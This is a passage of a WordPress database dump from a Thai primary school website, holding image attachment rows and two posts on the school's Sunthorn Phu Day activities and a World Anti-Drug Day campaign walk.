(1449,1,'2025-06-26 14:08:35','2025-06-26 07:08:35','','LINE_ALBUM_วันสุนทรภู่_250626_27','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_27','','','2025-06-26 14:08:35','2025-06-26 07:08:35','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_27.jpg',0,'attachment','image/jpeg',0),
(1450,1,'2025-06-26 14:08:35','2025-06-26 07:08:35','','LINE_ALBUM_วันสุนทรภู่_250626_29','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_29','','','2025-06-26 14:08:35','2025-06-26 07:08:35','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_29.jpg',0,'attachment','image/jpeg',0),
(1451,1,'2025-06-26 14:08:35','2025-06-26 07:08:35','','LINE_ALBUM_วันสุนทรภู่_250626_28','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_28','','','2025-06-26 14:08:35','2025-06-26 07:08:35','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_28.jpg',0,'attachment','image/jpeg',0),
(1452,1,'2025-06-26 14:08:35','2025-06-26 07:08:35','','LINE_ALBUM_วันสุนทรภู่_250626_30','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_30','','','2025-06-26 14:08:35','2025-06-26 07:08:35','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_30.jpg',0,'attachment','image/jpeg',0),
(1453,1,'2025-06-26 14:08:36','2025-06-26 07:08:36','','LINE_ALBUM_วันสุนทรภู่_250626_31','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_31','','','2025-06-26 14:08:36','2025-06-26 07:08:36','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_31.jpg',0,'attachment','image/jpeg',0),
(1454,1,'2025-06-26 14:08:37','2025-06-26 07:08:37','','LINE_ALBUM_วันสุนทรภู่_250626_32','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_32','','','2025-06-26 14:08:37','2025-06-26 07:08:37','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_32.jpg',0,'attachment','image/jpeg',0),
(1455,1,'2025-06-26 14:08:39','2025-06-26 07:08:39','','LINE_ALBUM_วันสุนทรภู่_250626_33','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_33','','','2025-06-26 14:08:39','2025-06-26 07:08:39','',1421,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_33.jpg',0,'attachment','image/jpeg',0),
(1456,1,'2025-06-26 14:08:52','2025-06-26 07:08:52','<!-- wp:paragraph -->\n<p><strong></strong><strong>วันที่ 26 เดือนมิถุนายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันสุนทรภู่ กวีเอกของโลก เพื่อเป็นการส่งเสริมให้นักเรียนได้ร่วมกันรำลึกถึงเกียรติคุณของท่านสุนทรภู่ และยกย่องเชิดชู ท่านสุนทรภู่ ตลอดจนเป็นการส่งเสริมบทกวี และวรรณกรรม ซึ่งเป็นผลงานของท่านสุนทรภู่ ให้เยาวชนได้ร่วมกันสืบทอด</strong><strong></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong>ณ ใต้ถุนอาคารเรียนหลังเรียนหลังใหม่ โดยมี </strong><strong>นายมีชัย</strong><strong> </strong><strong>สายเหล็ก</strong><strong> รองนายกองค์การบริหารส่วนตำบลโพธิ์ เป็นประธานในพิธี กิจกรรมประกอบไปด้วยกิจกรรม การแต่งกายเป็นตัวละครในวรรณคดี การประกวดแต่งกลอน การแข่งขันวาดภาพระบายสี ฯลฯ โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1423,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-768x1024.jpg\" alt=\"\" class=\"wp-image-1423\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1424,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-768x1024.jpg\" alt=\"\" class=\"wp-image-1424\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1428,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-768x1024.jpg\" alt=\"\" class=\"wp-image-1428\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1425,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-768x1024.jpg\" alt=\"\" class=\"wp-image-1425\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1427,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1024x768.jpg\" alt=\"\" class=\"wp-image-1427\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1426,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-768x1024.jpg\" alt=\"\" class=\"wp-image-1426\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1429,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-768x1024.jpg\" alt=\"\" class=\"wp-image-1429\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1431,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-1-1024x577.jpg\" alt=\"\" class=\"wp-image-1431\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1433,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1024x577.jpg\" alt=\"\" class=\"wp-image-1433\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1430,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1024x577.jpg\" alt=\"\" class=\"wp-image-1430\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1432,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1024x577.jpg\" alt=\"\" class=\"wp-image-1432\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1434,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-1024x577.jpg\" alt=\"\" class=\"wp-image-1434\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1436,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1024x577.jpg\" alt=\"\" class=\"wp-image-1436\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1435,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1024x577.jpg\" alt=\"\" class=\"wp-image-1435\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1437,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1024x577.jpg\" alt=\"\" class=\"wp-image-1437\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1438,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1024x577.jpg\" alt=\"\" class=\"wp-image-1438\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1439,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1024x577.jpg\" alt=\"\" class=\"wp-image-1439\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1440,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_18-1024x577.jpg\" alt=\"\" class=\"wp-image-1440\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1441,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_19-577x1024.jpg\" alt=\"\" class=\"wp-image-1441\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1442,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_20-1024x577.jpg\" alt=\"\" class=\"wp-image-1442\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1443,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_21-1024x577.jpg\" alt=\"\" class=\"wp-image-1443\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1444,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_22-1024x577.jpg\" alt=\"\" class=\"wp-image-1444\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1446,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_23-1024x577.jpg\" alt=\"\" class=\"wp-image-1446\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1445,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_24-1024x577.jpg\" alt=\"\" class=\"wp-image-1445\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1447,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_25-1024x577.jpg\" alt=\"\" class=\"wp-image-1447\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1448,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_26-1024x577.jpg\" alt=\"\" class=\"wp-image-1448\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1449,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_27-1024x576.jpg\" alt=\"\" class=\"wp-image-1449\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1451,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_28-1024x576.jpg\" alt=\"\" class=\"wp-image-1451\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1450,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_29-1024x576.jpg\" alt=\"\" class=\"wp-image-1450\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1452,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_30-1024x576.jpg\" alt=\"\" class=\"wp-image-1452\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1453,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_31-1024x576.jpg\" alt=\"\" class=\"wp-image-1453\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1454,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_32-1024x576.jpg\" alt=\"\" class=\"wp-image-1454\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1455,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_33-1024x576.jpg\" alt=\"\" class=\"wp-image-1455\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','วันสุนทรภู่ สู่ วันภาษาไทย','','inherit','closed','closed','','1421-revision-v1','','','2025-06-26 14:08:52','2025-06-26 07:08:52','',1421,'http://pakhaeng.ssk.in.th/?p=1456',0,'revision','',0),
(1457,1,'2025-06-26 14:11:09','2025-06-26 07:11:09','<!-- wp:paragraph -->\n<p>วันที่ 26 เดือนมิถุนายน พ.ศ.2568 โรงเรียนบ้านหนองปลาเข็ง กอไหล่ ได้จัดกิจกรรมวันต่อต้านยาเสพติดโลก เพื่อรณรงค์ให้นักเรียนและชุมชน ตระหนักเห็นถึงความสำคัญของการต่อต้านยาเสพติดที่เป็นบ่อนทำลายประเทศชาติและเยาวชน ณ โรงเรียนบ้านหนองปลาเข็ง กอไหล่ และชุมชนบ้านหนองปลาเข็ง และบ้านกอไหล่ นำโดย นางเสน่หา พลโสภา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ผู้อำนวยการโรงเรียน พร้อมด้วยคณะครูและบุคลากรทางการศึกษา นำขบวนเดินรณรงค์ต่อต้านยาเสพติดในชุมชน โดยกิจกรรมต่างๆ ประสบความสำเร็จลุล่วงไปได้ด้วยดี</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:gallery {\"linkTo\":\"none\"} -->\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped\"><!-- wp:image {\"id\":1460,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1460\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1462,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1462\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1459,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1459\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1461,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1461\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1463,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1463\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1464,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1464\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1465,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_7-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1465\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1467,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_8-2-1024x576.jpg\" alt=\"\" class=\"wp-image-1467\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1466,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_9-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1466\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1468,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_10-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1468\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1469,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_11-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1469\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1470,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-2-1024x576.jpg\" alt=\"\" class=\"wp-image-1470\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1471,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_13-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1471\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1472,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_14-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1472\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1473,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1473\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1474,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1474\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1475,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1-1024x576.jpg\" alt=\"\" class=\"wp-image-1475\"/></figure>\n<!-- /wp:image --></figure>\n<!-- /wp:gallery -->','เดินรณรงค์ วันต่อต้านยาเสพติดโลก','','publish','closed','closed','','%e0%b9%80%e0%b8%94%e0%b8%b4%e0%b8%99%e0%b8%a3%e0%b8%93%e0%b8%a3%e0%b8%87%e0%b8%84%e0%b9%8c-%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b8%95%e0%b9%89%e0%b8%b2%e0%b8%99%e0%b8%a2%e0%b8%b2','','','2025-06-26 14:11:11','2025-06-26 07:11:11','',0,'http://pakhaeng.ssk.in.th/?p=1457',0,'post','',0),
(1458,1,'2025-06-26 14:09:57','2025-06-26 07:09:57','','LINE_ALBUM_วันสุนทรภู่_250626_12','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_12-2','','','2025-06-26 14:09:57','2025-06-26 07:09:57','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_12-1.jpg',0,'attachment','image/jpeg',0),
(1459,1,'2025-06-26 14:10:22','2025-06-26 07:10:22','','LINE_ALBUM_วันสุนทรภู่_250626_3','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_3-2','','','2025-06-26 14:10:22','2025-06-26 07:10:22','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_3-1.jpg',0,'attachment','image/jpeg',0),
(1460,1,'2025-06-26 14:10:22','2025-06-26 07:10:22','','LINE_ALBUM_วันสุนทรภู่_250626_1','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_1-2','','','2025-06-26 14:10:22','2025-06-26 07:10:22','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_1-1.jpg',0,'attachment','image/jpeg',0),
(1461,1,'2025-06-26 14:10:23','2025-06-26 07:10:23','','LINE_ALBUM_วันสุนทรภู่_250626_4','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_4-2','','','2025-06-26 14:10:23','2025-06-26 07:10:23','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_4-1.jpg',0,'attachment','image/jpeg',0),
(1462,1,'2025-06-26 14:10:23','2025-06-26 07:10:23','','LINE_ALBUM_วันสุนทรภู่_250626_2','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_2-2','','','2025-06-26 14:10:23','2025-06-26 07:10:23','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_2-1.jpg',0,'attachment','image/jpeg',0),
(1463,1,'2025-06-26 14:10:23','2025-06-26 07:10:23','','LINE_ALBUM_วันสุนทรภู่_250626_5','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_5-2','','','2025-06-26 14:10:23','2025-06-26 07:10:23','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_5-1.jpg',0,'attachment','image/jpeg',0),
(1464,1,'2025-06-26 14:10:23','2025-06-26 07:10:23','','LINE_ALBUM_วันสุนทรภู่_250626_6','','inherit','','closed','','line_album_%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%aa%e0%b8%b8%e0%b8%99%e0%b8%97%e0%b8%a3%e0%b8%a0%e0%b8%b9%e0%b9%88_250626_6-2','','','2025-06-26 14:10:23','2025-06-26 07:10:23','',1457,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/LINE_ALBUM_วันสุนทรภู่_250626_6-1.jpg',0,'attachment','image/jpeg',0),
